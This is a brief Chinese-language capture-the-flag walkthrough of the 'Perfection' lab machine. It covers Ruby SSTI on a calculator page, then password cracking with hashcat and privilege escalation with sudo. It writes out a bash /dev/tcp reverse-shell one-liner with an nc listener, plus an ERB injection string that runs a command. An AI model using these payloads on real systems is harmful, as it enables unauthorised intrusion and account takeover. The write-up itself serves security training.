機器名稱:Perfection
難度:easy
首先使用nmap進行掃描可知開啟了web服務和ssh服務
訪問web網站,找到一個計算頁面
並且透過資訊收集可知,此網站為ruby語言開發,所以嘗試ssti注入,發現存在ssti注入
我們將payload先進行編碼
hURL -B "bash -i >& /dev/tcp/IP/7373 0>&1"
hURL -U "BASE64"
開啟埠監聽nc -lvnp 7373
然後將payload傳入獲取shell
(此處也可直接抓包輸入執行命令進行後續操作,例如KK%0A<%25%3d+`ls`+%25>)
成功找到user.txt
透過資訊收集可獲得susan的hash值
並且找到了hash原文的組成部分
於是使用hashcat進行爆破得到密碼
透過最初的掃描可知ssh服務開啟,於是登陸ssh
使用sudo su,密碼與上面密碼相同,然後檢視root.txt即可。